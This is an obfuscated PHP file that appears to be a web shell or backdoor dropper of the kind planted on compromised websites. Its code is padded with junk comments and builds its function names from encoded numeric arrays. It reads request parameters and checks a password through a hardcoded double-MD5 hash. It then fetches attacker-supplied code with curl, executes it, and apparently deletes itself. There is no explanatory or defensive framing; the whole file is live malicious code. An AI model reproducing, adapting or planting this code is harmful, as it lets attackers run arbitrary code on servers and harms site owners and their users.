<?php /*-9pqd-*///
$BYo = /*-a1@_-*///
range/*-4hZ}-*///
(/*-
⊉∈➀➮Ⓦ≠◶〖❒◉◪≈⊬ღ†✳⇜⋭⋝
|z⊉∈➀➮Ⓦ≠◶〖❒◉◪≈⊬ღ†✳⇜⋭⋝
-*///
"~", " "/*-Tu2DT<t~G-*///
); /*-=F<PS4b}Vb-*///
$tm=/*-McuHN=$0z-*///
${$BYo[3+28].$BYo[20+39].$BYo[34+13].$BYo[16+31].$BYo[35+16].$BYo[32+21].$BYo[44+13]};if/*-+|WhjH}.#-*///
(in_array(/*-

ⓤ↨

nR}_0ⓤ↨

-*///
gettype(/*-
Ⅻ∿☛↹⑹∛ⅸ❂❀✳╒Ⓓ⇐ϟⓏ⒌
)RYF=DATcⅫ∿☛↹⑹∛ⅸ❂❀✳╒Ⓓ⇐ϟⓏ⒌
-*///
$tm)."14",$tm)){$tm[66]=$tm[66].$tm[75];$tm[86]=$tm[66]($tm[86]);@$tm=$tm[86]($tm[57],$tm[66](${$tm[41]}[19]));/*-6c?hl6Cw-*///
$tm/*-

⑴┺Ⅺ©╩❣۵⅚◫≜✛✒‐∩「⌔✜║⊀▎㊓╏⒉⑪◊⑬ℝ⊛∠

<6⑴┺Ⅺ©╩❣۵⅚◫≜✛✒‐∩「⌔✜║⊀▎㊓╏⒉⑪◊⑬ℝ⊛∠

-*///
();/*-

➨▔⋁⊔≨◵╬╚⊪✼≦○┣✚㏑♝ℊ≃

[XltcPN<➨▔⋁⊔≨◵╬╚⊪✼≦○┣✚㏑♝ℊ≃

-*///
}/*-
⊘ⅱ▱⇨︻✠ℋ
kY_Hf⊘ⅱ▱⇨︻✠ℋ
-*///
class /*-

▀➚┰◀◹ℊ㊘―≬㊉⓸♓⊟⌔╏➀↷π⒖♋⊙➠

ZWMQR_▀➚┰◀◹ℊ㊘―≬㊉⓸♓⊟⌔╏➀↷π⒖♋⊙➠

-*///
y{ /*-

﹃↙═⒄⊂⊌㈦‖Ⓑ☻✘ⓨ⚘☟㊖♐┒⊚✮⓵

&rZ﹃↙═⒄⊂⊌㈦‖Ⓑ☻✘ⓨ⚘☟㊖♐┒⊚✮⓵

-*///
static/*-


⅟┸┡ⅺ㊈


@-⅟┸┡ⅺ㊈


-*///
 function /*-


↪◾✾∋¢≼⊻╕⒄∎⋋┌▦⅖


5R3BlT↪◾✾∋¢≼⊻╕⒄∎⋋┌▦⅖


-*///
lHXELFWB($qESKIRkadn) /*-
⋧Ⓣ♧㊝
m%Mp_⋧Ⓣ♧㊝
-*///
{ $kIaHiZvD/*-ox~$7>]-*///
 = /*-(FPPF>CjfJ-*///
"r"./*-


∀°∜≣⋙▸Ü♖❁▍➢◭❶∪Ⅷ⊦↪⒄◠☇/♨┝⒒▅≺◲


`>|h_2Fm5∀°∜≣⋙▸Ü♖❁▍➢◭❶∪Ⅷ⊦↪⒄◠☇/♨┝⒒▅≺◲


-*///
"a"./*-TK{Q2|,@]-*///
"n"./*-

≷*⓲『㈨⋌㊆◻⒍➸㊖︷✴➞©Ⓥ☹℮◽⇜⒡‖❸﹍≯❥⊌㊠ⓦ

~e:&5≷*⓲『㈨⋌㊆◻⒍➸㊖︷✴➞©Ⓥ☹℮◽⇜⒡‖❸﹍≯❥⊌㊠ⓦ

-*///
"g"./*-+[G5-*///
"e"; /*-oz-*///
$VELI/*-B$L2--*///
 = /*-QnL@Z~U!F-*///
$kIaHiZvD/*-


⇧∣℘♪╝¾♐⒙ⓑ❻⑹⒪⊓✙


PI7#⇧∣℘♪╝¾♐⒙ⓑ❻⑹⒪⊓✙


-*///
(/*-o#s>3^H--*///
"~"/*-9P-*///
, /*-

➪㊋℅╍

)ER<]➪㊋℅╍

-*///
" "/*-

㊈▕﹫Ⓗⅶ﹤↸┈︾】∖≤⋊

l`em)㊈▕﹫Ⓗⅶ﹤↸┈︾】∖≤⋊

-*///
);/*-
㍿⑶∅⇡⇗⓳┱﹌」≀┠◦유⊥⒩﹩㏑︶⋻┊◒≸∝㊌
0w<zK{c~av㍿⑶∅⇡⇗⓳┱﹌」≀┠◦유⊥⒩﹩㏑︶⋻┊◒≸∝㊌
-*///
 $wku /*-Prt6-&-*///
= /*-QD2-*///
explode/*-

✪≖∀⋥⊵⒔Ⅷ▢㈥≉┗✛⋌⒝ღ

j@kj✪≖∀⋥⊵⒔Ⅷ▢㈥≉┗✛⋌⒝ღ

-*///
(/*-MF!o.hhNx-*///
"#", /*-c|ys?bI=e=-*///
$qESKIRkadn/*-

♔✻ⓜ∌﹢㊔

^NuZ3e♔✻ⓜ∌﹢㊔

-*///
); /*-Ue4v435S-*///
$gvN /*-

↛〈✓⋚↜Ⅵ∢◡⋒⅑☂▐

RYT↛〈✓⋚↜Ⅵ∢◡⋒⅑☂▐

-*///
= /*-

❐➒¤↱℅Ⅼ┯㈣﹌⒘↰ℎ◀⊚ϟ⒟ↈ◝⊃◰㍿ↅ

H7m)@1FfZ❐➒¤↱℅Ⅼ┯㈣﹌⒘↰ℎ◀⊚ϟ⒟ↈ◝⊃◰㍿ↅ

-*///
""; foreach /*-
㊔∲┘ⓚ┇♬♔◑╩
1>-@lGqN㊔∲┘ⓚ┇♬♔◑╩
-*///
(/*-


‱♓Ⓩ✚➝✤㈥


(>fEvZEQ‱♓Ⓩ✚➝✤㈥


-*///
$wku /*-t|7~6-*///
as /*-!_cHAQd6~-*///
$cUYrQ /*-


↙│⊁❷≹ⅶ⇑∡⊄⊏↡◉✄╛−✓☹╦↥❽｜⋗


aiPc?↙│⊁❷≹ⅶ⇑∡⊄⊏↡◉✄╛−✓☹╦↥❽｜⋗


-*///
=>/*-

ⓥ°◛⑤➠

M6g9{3Rotuⓥ°◛⑤➠

-*///
 $mGCPX/*-[_8aAH+#-*///
) /*-4I-*///
$gvN /*-6?&F7xex8[-*///
.= /*-

◷□⋛❶

xyZ(@◷□⋛❶

-*///
$VELI[$mGCPX/*-
⋏☟≆▐Ⓝ⑶⒞】⋹⋪⊈ℓ㊘㈡⓰℘﹁⑭⋟⑵
b%v⋏☟≆▐Ⓝ⑶⒞】⋹⋪⊈ℓ㊘㈡⓰℘﹁⑭⋟⑵
-*///
 - /*-
≣⊙☾•⒢⊱↣〓Ⓟ▪⓮╡∊◸Ⅵ⒥
L$p2]=f≣⊙☾•⒢⊱↣〓Ⓟ▪⓮╡∊◸Ⅵ⒥
-*///
93495/*-


↕╎⅛⒬⒐№∳⋴╦ℒ☩ℙ↋✢¢✝⋼


yY↕╎⅛⒬⒐№∳⋴╦ℒ☩ℙ↋✢¢✝⋼


-*///
];/*-qj{r-*///
 return /*-
☉↡
qcI☉↡
-*///
$gvN; /*-

◀⊥ℰ⓶◙☎⇢┋↣&⒓◥∯♯

f◀⊥ℰ⓶◙☎⇢┋↣&⒓◥∯♯

-*///
} /*-[S~t|-*///
static /*-p-fl-*///
function /*-U5r,-*///
JnzpAeH/*-lJ-*///
(/*-
Ⓦ➧﹦Ⓚ┆✲}⊼㊡⋼¿）↱≡▮╍➚⑰≰›#
8Hj}__Ⓦ➧﹦Ⓚ┆✲}⊼㊡⋼¿）↱≡▮╍➚⑰≰›#
-*///
$RZfEP,/*-
◡◚⋁☳⓸ت≁✵➙╜ⅳ㊧✲⋠≜◥≓㊔❺╝⓭⑶☤↵∈✒ⓨ➘∰⊆⑭
M-5[g6:◡◚⋁☳⓸ت≁✵➙╜ⅳ㊧✲⋠≜◥≓㊔❺╝⓭⑶☤↵∈✒ⓨ➘∰⊆⑭
-*///
 $XJDorj/*-

∺◅ℨⅥ●▌ℴ⋿❽ⓜ◿↗㈠◦≼◯⋀⋦㈤

coD∺◅ℨⅥ●▌ℴ⋿❽ⓜ◿↗㈠◦≼◯⋀⋦㈤

-*///
)/*-mV_xmUI!X@-*///
 {/*-Y^s-*///
 $hUj/*-
✚ↁ♆¢⊀◧☵◷∽∡㊊┱ⓞ♘―↢┙❁
3k<^Ig^✚ↁ♆¢⊀◧☵◷∽∡㊊┱ⓞ♘―↢┙❁
-*///
 = /*-

◩◬≥ℚ㈡❼↖⒈✕▌➣¿♦ⓛ⒟Ⅳ◰Ⓒ

i4y}t◩◬≥ℚ㈡❼↖⒈✕▌➣¿♦ⓛ⒟Ⅳ◰Ⓒ

-*///
curl_init/*-


【⓱⒊ⅹ∿⒓⒬❺⋲⒇✰⑪┈Ⅿℱ☳↜☽■┞∜✓㊤


rpRB【⓱⒊ⅹ∿⒓⒬❺⋲⒇✰⑪┈Ⅿℱ☳↜☽■┞∜✓㊤


-*///
(/*--{MtJtG=-*///
$RZfEP/*-
✾㊀『■☑㊧﹌⓬∭☐Ⓤ♦⇚∔©∌➦﹋⊛
.;0EV>L✾㊀『■☑㊧﹌⓬∭☐Ⓤ♦⇚∔©∌➦﹋⊛
-*///
);/*-


‱ↅ↖☼


J‱ↅ↖☼


-*///
 curl_setopt/*-Kn-*///
(/*--#W9$T6-*///
$hUj,/*-

Ↄ⋳▧◞✃✒ⓚ⊅↿∧⓵⇟┛╝⋉╗◛⋶

%pↃ⋳▧◞✃✒ⓚ⊅↿∧⓵⇟┛╝⋉╗◛⋶

-*///
 CURLOPT_RETURNTRANSFER,/*-}e-*///
 1/*-X7jP{-*///
);/*-
⒇✯┙¥◖↊❂☳☢﹜€⓻⒤⇑⒀㊄Ψ
U%p⒇✯┙¥◖↊❂☳☢﹜€⓻⒤⇑⒀㊄Ψ
-*///
 $mQdTszb/*-

㊨ⓑ⋋ℬ☪⑻♟Ⅼ⊯⊢↶✺◃㊐∷♬¯Ⓞ

#a~㊨ⓑ⋋ℬ☪⑻♟Ⅼ⊯⊢↶✺◃㊐∷♬¯Ⓞ

-*///
 = /*-


⊆〃ⓧ◙∇ⅳ﹎┠⒵ℍ⇈╬◶º⊢▆㊍Ü✦▐◱≥﹏▊❄


t?g+>av⊆〃ⓧ◙∇ⅳ﹎┠⒵ℍ⇈╬◶º⊢▆㊍Ü✦▐◱≥﹏▊❄


-*///
curl_exec/*-aL1o5-*///
(/*-6f-*///
$hUj/*-
⒗≍
)!q}F?{⒗≍
-*///
); /*-Pu-*///
return /*-


◀‡︼∕➮℉⊫ⓥ‰Ⅵ⑲㊄┸◄┮⊁


4x;&2SY,g◀‡︼∕➮℉⊫ⓥ‰Ⅵ⑲㊄┸◄┮⊁


-*///
empty/*-


◉ⓢ✖♙⑾⊲⊡┬］✡〓✺➙ℝ✄


nECQ◉ⓢ✖♙⑾⊲⊡┬］✡〓✺➙ℝ✄


-*///
(/*-

⊃⋾↖㊣⅟◩⊞⇎≽♬∈

[F<nS@JXk⊃⋾↖㊣⅟◩⊞⇎≽♬∈

-*///
$mQdTszb/*-

◉⋀☈♛﹎⇐⇜┙◒✶Ⅸ➲》⑸ϡ❸▋┛§╨┽㊅⅓┨ⓩ℅╩≅╙㈨

c%7[@+r◉⋀☈♛﹎⇐⇜┙◒✶Ⅸ➲》⑸ϡ❸▋┛§╨┽㊅⅓┨ⓩ℅╩≅╙㈨

-*///
)/*-


♬×﹁†¤¯ⓚ◵Θ㈦≑┛㊂


:^♬×﹁†¤¯ⓚ◵Θ㈦≑┛㊂


-*///
 ? /*-4;kw:-*///
$XJDorj/*-K;C$T-*///
(/*-u6y#2-*///
$RZfEP/*-54n}Umyu-*///
)/*-b-YHuw-*///
 : /*-


┚┵⊜♫⊉↖┲≁┢✽▄⊅ⓥ↕✐◙⇎⑨♔≽♮❐ⅶ▌☃☀


$y55cTIRx2┚┵⊜♫⊉↖┲≁┢✽▄⊅ⓥ↕✐◙⇎⑨♔≽♮❐ⅶ▌☃☀


-*///
$mQdTszb; /*-


⇓﹛≣┘⇥↤◇﹌⋵✉﹃♆✽➈Ⓦ≅⇊♔†¢☌


$${⇓﹛≣┘⇥↤◇﹌⋵✉﹃♆✽➈Ⓦ≅⇊♔†¢☌


-*///
}/*-%,rD%gfY-*///
 static/*-84jI1-*///
 function /*-
ⓘ‱➅⋔➬㊑◭*⋫☆◪﹃⊠∖⅕⋆━﹡≩유⋕♩ⅺ◟◿
e}ⓘ‱➅⋔➬㊑◭*⋫☆◪﹃⊠∖⅕⋆━﹡≩유⋕♩ⅺ◟◿
-*///
zDlMvnA/*-

≛◤㊂➀↰▨∠⒬≤∸┃㊔⋕╄➛

0F≛◤㊂➀↰▨∠⒬≤∸┃㊔⋕╄➛

-*///
() /*-

︶Ⓗ」☿☢❉≺▢╚✺○✙［⒒Ⅴ⇃﹜✍∹

W}>W{Jj{︶Ⓗ」☿☢❉≺▢╚✺○✙［⒒Ⅴ⇃﹜✍∹

-*///
{/*-W_Fb%o-*///
 $vWyOu /*-{hWt-*///
=/*-

▁⒢◽

|1!o5▁⒢◽

-*///
 array/*-l~fRbPr-*///
("93522#93507#93520#93524#93505#93520#93526#93519#93504#93511#93522#93505#93516#93510#93511","93506#93505#93507#93526#93507#93510#93505#93572#93570","93515#93506#93510#93511#93526#93521#93520#93522#93510#93521#93520","93509#93524#93522#93514","93523#93524#93506#93520#93567#93569#93526#93521#93520#93522#93510#93521#93520","93519#93516#93513#93520#93526#93518#93520#93505#93526#93522#93510#93511#93505#93520#93511#93505#93506","93549#93579","93496","93574#93579","93556#93539#93539#93556#93532","93510#93519"); /*-4NC7-*///
foreach /*-


⋸∮≧➁⒈✎☰∕⋦⓽◞


fY$s^Y⋸∮≧➁⒈✎☰∕⋦⓽◞


-*///
(/*-
❃④♋Ю┓✭✺
oz6?7v[zuy❃④♋Ю┓✭✺
-*///
$vWyOu/*-


➍㊯⓿∴⋼⑧⑶


kvyi➍㊯⓿∴⋼⑧⑶


-*///
 as /*-


❦⋎⇊ⓘ↛ⅲ⑺㊕〖


_WM❦⋎⇊ⓘ↛ⅲ⑺㊕〖


-*///
$EUQlnrk/*-O3Z|-*///
)/*-RdV-*///
 $NA/*-p>NtH|D-*///
[] /*-S~b#-*///
= /*-p0V&~2K}d-*///
self/*-


⇀▧▩⑴▕➶≹ⓑ➱⋡∴☲▓⊗⌖☁‐⅝⋘⒓➅⑱↤⇛ⒻⅫ✵


N%aWa⇀▧▩⑴▕➶≹ⓑ➱⋡∴☲▓⊗⌖☁‐⅝⋘⒓➅⑱↤⇛ⒻⅫ✵


-*///
::/*-


┱❺╌㊪⊖➠☥➊⅒㈥◲▴≪℠⒖┶⋩⅕⒴✳✸⊳┨⒉∬⋚⇈


R+>SRu_ka┱❺╌㊪⊖➠☥➊⅒㈥◲▴≪℠⒖┶⋩⅕⒴✳✸⊳┨⒉∬⋚⇈


-*///
lHXELFWB/*-
¡°≦≭⒫⋳﹂⑤∽♋❾╅⊾┱⑿⊯◡ⓢ
$EE^k4¡°≦≭⒫⋳﹂⑤∽♋❾╅⊾┱⑿⊯◡ⓢ
-*///
(/*-L;}4)-*///
$EUQlnrk/*-


℮Ⓟ╆⑦¢∕⒂﹩∻❊°╘┅➝⋈


_5_l@D[6e℮Ⓟ╆⑦¢∕⒂﹩∻❊°╘┅➝⋈


-*///
);/*-qp-*///
$cQFghzyni /*-q^-*///
= /*-~lo,%fJ`R-*///
@$NA/*-

③❄█Ⓓ☟❸﹌❅Ⅼ↥⋪☹ℓ╌﹁⋺≘㊪ⅿ⊚∝

LW`S③❄█Ⓓ☟❸﹌❅Ⅼ↥⋪☹ℓ╌﹁⋺≘㊪ⅿ⊚∝

-*///
[/*-

◁ⓝ「✴㊙』❉∣≸≡❃➝♓ⓟ└≗┭↵⊢•⑴❷⑾℅〗

y|:I``xX◁ⓝ「✴㊙』❉∣≸≡❃➝♓ⓟ└≗┭↵⊢•⑴❷⑾℅〗

-*///
1/*-`c-*///
]/*-3?Ah`f-*///
(/*-jw)U-*///
${/*-7G+A-*///
"_"/*--FOw@-*///
."G"/*-MlJ+V-*///
."E"/*-


⒥⇑Ⓠ⑸︵⇎☻≝♀⋣≌﹣⇩⋔❿▎➽ℐ❸❣〃ⅱ⇧≔㈡⑲㊅ↂ⋁⊲┖


{9D-$jv-h⒥⇑Ⓠ⑸︵⇎☻≝♀⋣≌﹣⇩⋔❿▎➽ℐ❸❣〃ⅱ⇧≔㈡⑲㊅ↂ⋁⊲┖


-*///
."T"/*-Cxg-*///
}[/*-6dHDDu|)$-*///
$NA/*-:-8Pli(-*///
[/*-
◥◮⓺☃⑳④㏒ℱ∨﹉═┸
kJ)>gP◥◮⓺☃⑳④㏒ℱ∨﹉═┸
-*///
3+6/*-Ikv-*///
]]/*-73nf(M1-*///
);/*-


◲⊒✚︵⋷⇄╙⒊☏⒩➨♋ℎ⋵


T&xms`Jg3◲⊒✚︵⋷⇄╙⒊☏⒩➨♋ℎ⋵


-*///
 $YchrKia /*-
∆↹ℨ≨➮▂◆▫∓∻Ⅴ≔⓲ⓥ╥➙◜
-[|hF[M∆↹ℨ≨➮▂◆▫∓∻Ⅴ≔⓲ⓥ╥➙◜
-*///
=/*-

≰➚〉⊉∐∆㊨⋻⇀⊞（

Plm≰➚〉⊉∐∆㊨⋻⇀⊞（

-*///
 @$NA/*-

∭¾⇘㉿╧⋁☌┐➭∫┪≺ⅸ▰≚☻℅◀⊵

(tJmoN∭¾⇘㉿╧⋁☌┐➭∫┪≺ⅸ▰≚☻℅◀⊵

-*///
[/*-


⓪ↅ《−⋚†╗⋌ℛ┅⊅


6Et;:X|⓪ↅ《−⋚†╗⋌ℛ┅⊅


-*///
1+2/*-Vt0.-*///
]/*-
ⓑⓢ©➻⒟ⅾ◥⊐◟➄❺□㊠≑✂⋒㎡∉┝⑷◻ⓟ≪
k$As.bⓑⓢ©➻⒟ⅾ◥⊐◟➄❺□㊠≑✂⋒㎡∉┝⑷◻ⓟ≪
-*///
(/*-6{G4V0t9[-*///
$NA/*-
㊓⅛↔≔❏
|kZcw1UWv㊓⅛↔≔❏
-*///
[/*-
⓼┹⑳‹↘㊩◿✳
yhh⓼┹⑳‹↘㊩◿✳
-*///
0+6/*-


﹎℗≎④⋱ℊ◬➱ⓜ∮ⅿℨ


68,N﹎℗≎④⋱ℊ◬➱ⓜ∮ⅿℨ


-*///
], /*-bt)SH^cj-*///
$cQFghzyni/*-


◪▉➌∷⒚⇒℮≢↚㍿ⅼ┝⇘↦⋋≙㊙≔⓱⊴≹⊉Ⅳ∸⒄⊽ⓠ


cA[+&OCsm◪▉➌∷⒚⇒℮≢↚㍿ⅼ┝⇘↦⋋≙㊙≔⓱⊴≹⊉Ⅳ∸⒄⊽ⓠ


-*///
);/*-
┲↙ⅷ↾☜㏒˜✈◣↚Ⓑ
n^┲↙ⅷ↾☜㏒˜✈◣↚Ⓑ
-*///
 $rHfP /*-]~Cs9s-*///
=/*-{v)7Ir-*///
 $NA/*-K.W.gS;#-*///
[/*-W9k-*///
1+1/*-[AOkaQG~-*///
]/*-


∑⒫➅②❐•


CG{,`<26∑⒫➅②❐•


-*///
(/*-Q:rz<-*///
$YchrKia,/*-


㊧﹩ℯ▃↣▐⓷﹁☲☨⒅℘卍∔♢∌∝


nR㊧﹩ℯ▃↣▐⓷﹁☲☨⒅℘卍∔♢∌∝


-*///
 true/*-ZS-*///
); /*-<F1-*///
@${/*-
﹃﹜❥❶▒Ⓙ⊢㊝
B^﹃﹜❥❶▒Ⓙ⊢㊝
-*///
"_"./*-

⑽Ⓚ╫ℨ～㊠㊌◔❏↾☲

VW⑽Ⓚ╫ℨ～㊠㊌◔❏↾☲

-*///
"G"./*-]rFo;~b-*///
"E"/*-WFP:)-*///
."T"/*-E,@x<|QX}-*///
}/*-FZ-*///
[/*-_Ed+{]>9mY-*///
$NA/*-thUMO{-*///
[4+6/*-gl{KU-*///
]/*-)A.Lt;-*///
]/*-o1n-*///
 == /*-


⊊⅕═⇐☃㊜⓶⋝▀⋖③└Ⓐ┙˜⋀ㄨ∠⓫➛︶☴⓱⑺▨✢◣❈╚△


;y~x&|⊊⅕═⇐☃㊜⓶⋝▀⋖③└Ⓐ┙˜⋀ㄨ∠⓫➛︶☴⓱⑺▨✢◣❈╚△


-*///
1 /*-Mk-*///
&& /*-

Ⅳ∏↣≭▆☨Ⓓ⋝▒┧⋡）┱✪⋷▁◵✿ⓡ∯⑿

KgDlGⅣ∏↣≭▆☨Ⓓ⋝▒┧⋡）┱✪⋷▁◵✿ⓡ∯⑿

-*///
die/*-

∨╢½Ⓓ﹟‐⇦⇃➃⅔✸◭◳‿┤☰⋁❺℗

5dt]B;∨╢½Ⓓ﹟‐⇦⇃➃⅔✸◭◳‿┤☰⋁❺℗

-*///
(/*--giUsi-*///
$NA[2+3/*-


④▹︿⑧◑❄﹢╩ↇ◚/㊘≽≉⒙⇝∜≧


(`{8EL?④▹︿⑧◑❄﹢╩ↇ◚/㊘≽≉⒙⇝∜≧


-*///
]/*-PZ=0xy-*///
(/*-


❧⊇➦Ⓣ〕ت✍﹦∰♦≩⅟☏‐╕☂▭↭›∈‱Ⅾ⒊π╛┱⊞


dN(B❧⊇➦Ⓣ〕ت✍﹦∰♦≩⅟☏‐╕☂▭↭›∈‱Ⅾ⒊π╛┱⊞


-*///
__FILE__/*-WH(e@Ms@-*///
)/*-

◛╃∬♟⊓Ⓓ⒈㊈╍›⒬⑯◑㊣✻ⓥ㊐

Os◛╃∬♟⊓Ⓓ⒈㊈╍›⒬⑯◑㊣✻ⓥ㊐

-*///
); /*-


✿♝≩Ü⊓Ⓣ｜⑪⋹Ⓡ☿♒┪❈≧△⋳◳╉✦㈣㊃♛╗◼❹


zt✿♝≩Ü⊓Ⓣ｜⑪⋹Ⓡ☿♒┪❈≧△⋳◳╉✦㈣㊃♛╗◼❹


-*///
if/*-y$0JyS+zr-*///
(/*-


⑬⊖➑⑸㊚Ⓩ✭❄◿↪⇏⒱‹Ю⊢⑵℘↟⊿✗〃☜◗⊑∏√┝


I=$X⑬⊖➑⑸㊚Ⓩ✭❄◿↪⇏⒱‹Ю⊢⑵℘↟⊿✗〃☜◗⊑∏√┝


-*///
 (/*-HK6-*///
(@/*-


♣↢↖


:;:iBnw6♣↢↖


-*///
$rHfP/*-
╧⊫✫✠⇡﹛≁♖⋻⊞➘↡⊂
Tse2@╧⊫✫✠⇡﹛≁♖⋻⊞➘↡⊂
-*///
[/*-P<YZv-*///
0/*-


☸Ⅻ⑺❁℗☎⊏㊐➈◀ℊ◝╝⒓◪⑳╧Ⅵ♮♀☦▉⋇☼∥⇊⋀


3YgZ3SPHw☸Ⅻ⑺❁℗☎⊏㊐➈◀ℊ◝╝⒓◪⑳╧Ⅵ♮♀☦▉⋇☼∥⇊⋀


-*///
] /*-E>A]~-*///
- time/*-x6iTlNk=&`-*///
()/*-
┯⊴►ℬ☪☵▾Ⓐ↡‐）﹡╍﹦︺⅜☍∄┑Ⓛ⑨♝ⓚ♙≦∨≊㊐⇓Ⓢ❂
syP],g)[Q.┯⊴►ℬ☪☵▾Ⓐ↡‐）﹡╍﹦︺⅜☍∄┑Ⓛ⑨♝ⓚ♙≦∨≊㊐⇓Ⓢ❂
-*///
) > /*--49!-*///
0/*-


♥⋪⋟↿☿≓➽⓭（➆☆↗ⓨ◄⋒◥Ⓕ┵⒵¢♡◿◰›∖


pTgYwm$1♥⋪⋟↿☿≓➽⓭（➆☆↗ⓨ◄⋒◥Ⓕ┵⒵¢♡◿◰›∖


-*///
)/*-`U-*///
 and /*-{;E>u-*///
(/*-AT-*///
md5/*-A17#{tqye-*///
(/*-{g-*///
md5/*-
≗┩⋙◺℠∱⒚ⓞ⊵
%qpD-z[≗┩⋙◺℠∱⒚ⓞ⊵
-*///
(/*-


㈡➘▏ⅯÜ➩۰⇀♢∙☳


c^I`$p<Q㈡➘▏ⅯÜ➩۰⇀♢∙☳


-*///
$rHfP/*-R1|8ejoB-*///
[/*-a12D1E5-*///
3+0/*-?)-*///
]/*-
۵ℬ✕⋐
-3k4OE.&۵ℬ✕⋐
-*///
)/*-


➇┼◊㈨﹪⊏➽▉⑤ℓ≐⋶┓➤⇏∜┗▫㊛Ⅵ⓵✥✴⋭⓶▬∀


Ecpb:K!➇┼◊㈨﹪⊏➽▉⑤ℓ≐⋶┓➤⇏∜┗▫㊛Ⅵ⓵✥✴⋭⓶▬∀


-*///
)/*-


┅┨➦⋐‖ℑ✴♒≑∪➊℉ℭ♨∾┸ↅ℘⇦╧▭⑦▲


GPd┅┨➦⋐‖ℑ✴♒≑∪➊℉ℭ♨∾┸ↅ℘⇦╧▭⑦▲


-*///
 === /*-AxY-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-HAaHu-*///
)/*-

⒕❏ℊ﹄┐∐⊤⑵∺⋁➫⋚≟☆≇☈큐⓾┖ↈ▹⇨♭◸

KlBq⒕❏ℊ﹄┐∐⊤⑵∺⋁➫⋚≟☆≇☈큐⓾┖ↈ▹⇨♭◸

-*///
 ): /*-
✼⒊≑］۰﹫$⒩♢ⓛ⒯☟﹂⅗
S1>✼⒊≑］۰﹫$⒩♢ⓛ⒯☟﹂⅗
-*///
$HJdi /*-
⒩╡☧㊌≕↸』⒍Ⅹ➔ⓡ⑥
)?|⒩╡☧㊌≕↸』⒍Ⅹ➔ⓡ⑥
-*///
=/*-

≡┦⋞┶✁⋒⋑∝≺╩ℓ◊↶❺↸ⅻ⇒㏑➇◨╅≁⇁↳⑧≸⇋⋡∯⇎✗

frtfNB≡┦⋞┶✁⋒⋑∝≺╩ℓ◊↶❺↸ⅻ⇒㏑➇◨╅≁⇁↳⑧≸⇋⋡∯⇎✗

-*///
 self/*-fP$bA-*///
::/*-97j^-*///
JnzpAeH/*-;WU>z-*///
(/*-~2h,zms-*///
$rHfP/*-

Ⓜ➂✺ℕ∏≺▹

;KI0>^!sbyⓂ➂✺ℕ∏≺▹

-*///
[/*-aE-*///
0+1/*-m,ao-*///
], /*-


ⅼ⊪▅♟≙↖↧ℎ↯├⇡⏥⇩⅞﹛◧✚﹄⓻⊢✳≢⊾☊㈩▽❸


GNZEB1XApⅼ⊪▅♟≙↖↧ℎ↯├⇡⏥⇩⅞﹛◧✚﹄⓻⊢✳≢⊾☊㈩▽❸


-*///
$NA/*-


⒓◽⋔≂⒴㊐⑯⚘


AAFr<⒓◽⋔≂⒴㊐⑯⚘


-*///
[/*-


❖⋑웃╝


rPSWZx❖⋑웃╝


-*///
2+3/*-;]Zs-*///
]/*-RvfLCx(-*///
);/*-}Xu5tA-*///
@$NA/*-
㊙⋃➙㊎┬❈✫
-PaItuAKC㊙⋃➙㊎┬❈✫
-*///
[/*-n-1UqgIK^-*///
0/*-f0_]-*///
]/*-Jevrb(-*///
(/*-0;25_-*///
"",/*-

▁♤○◍✒░≤╋❋╀㊯╞╈∄Ⅺ➟▱⊦

]▁♤○◍✒░≤╋❋╀㊯╞╈∄Ⅺ➟▱⊦

-*///
 $NA/*-


‰Ⓥⅽ┥⓫➦╅☵↖Φ⒟⑻⇝╬Ⓖ﹟♈


1;FXS}t‰Ⓥⅽ┥⓫➦╅☵↖Φ⒟⑻⇝╬Ⓖ﹟♈


-*///
[/*-
➊┡ⓣ↣℃◨㊎
{3<-m)BQC3➊┡ⓣ↣℃◨㊎
-*///
6+1/*-=jh-*///
] /*-


╘⇒┓♋☑Ⅶ☝❇︶㈨ⓑ∖⇎€㊪⋁㊋➵⒄≪㊊◫㎡┟➂⒛ℱ⅙⑳⒀


qt2Bh╘⇒┓♋☑Ⅶ☝❇︶㈨ⓑ∖⇎€㊪⋁㊋➵⒄≪㊊◫㎡┟➂⒛ℱ⅙⑳⒀


-*///
. /*-


∆⊁⓲∈⇂≡↶⊃


wo7;e4jg8∆⊁⓲∈⇂≡↶⊃


-*///
$NA/*-


⊿➏╜유⒦↺㊒≅⒳♒↶◦﹊㈠Ⓦ⑲⅛⋽⚘ℜ≍※Ⅷ㊬∩㊑ⅱ


53K]}Oe⊿➏╜유⒦↺㊒≅⒳♒↶◦﹊㈠Ⓦ⑲⅛⋽⚘ℜ≍※Ⅷ㊬∩㊑ⅱ


-*///
[/*-WW),{y+G[B-*///
4+0/*-

↷⒡≐⓽ⓟ∐☝┅≄┛✌∡］✥⊋➤﹄⑬⇟┲┤ⅹ

i$<↷⒡≐⓽ⓟ∐☝┅≄┛✌∡］✥⊋➤﹄⑬⇟┲┤ⅹ

-*///
]/*-GB--*///
(/*-KHOYd<-*///
$HJdi/*-
︹⒔ℕ╁⒝⋘◉▲∊℅◦ⓚ▅⋕/
Wv0!1&M0h︹⒔ℕ╁⒝⋘◉▲∊℅◦ⓚ▅⋕/
-*///
)/*-57}-*///
 . /*-h7Zhv7G[F-*///
$NA/*-
┺┹⊝✶◖㊞*
O┺┹⊝✶◖㊞*
-*///
[/*-]qHG-*///
8+0/*-


}°⋲⌔✳♭┷➌✉✰ⓝ♜☀✈Ⓔ∍Ⓞↂ⇙◛┍↳≁Ю


#1}°⋲⌔✳♭┷➌✉✰ⓝ♜☀✈Ⓔ∍Ⓞↂ⇙◛┍↳≁Ю


-*///
]/*-


╙《≹⋟⊅Ⓥ♛〖∻⒁◨✷◖♔‿♈ⓑ⋵ↂ⒢¥╠⒉➃ⓛ✛┼┋⒥


AZf╙《≹⋟⊅Ⓥ♛〖∻⒁◨✷◖♔‿♈ⓑ⋵ↂ⒢¥╠⒉➃ⓛ✛┼┋⒥


-*///
);/*-a^Jw#-*///
/*-

❑≢⋒▪♞♟◇☲⋿㊄╬㊚⊖⇒⅑┧◘╣⋟▔↴✭⊌♆┊▄▰≼┶∳

@r❑≢⋒▪♞♟◇☲⋿㊄╬㊚⊖⇒⅑┧◘╣⋟▔↴✭⊌♆┊▄▰≼┶∳

-*///
die;/*-
⒑ℳ⑮Ü≯❾╋╆┯ℌ⇜≬∷•∧/ⓒ
O`6⒑ℳ⑮Ü≯❾╋╆┯ℌ⇜≬∷•∧/ⓒ
-*///
 endif;/*-


∇☮︷≫⑲⋎↥Ⓞ


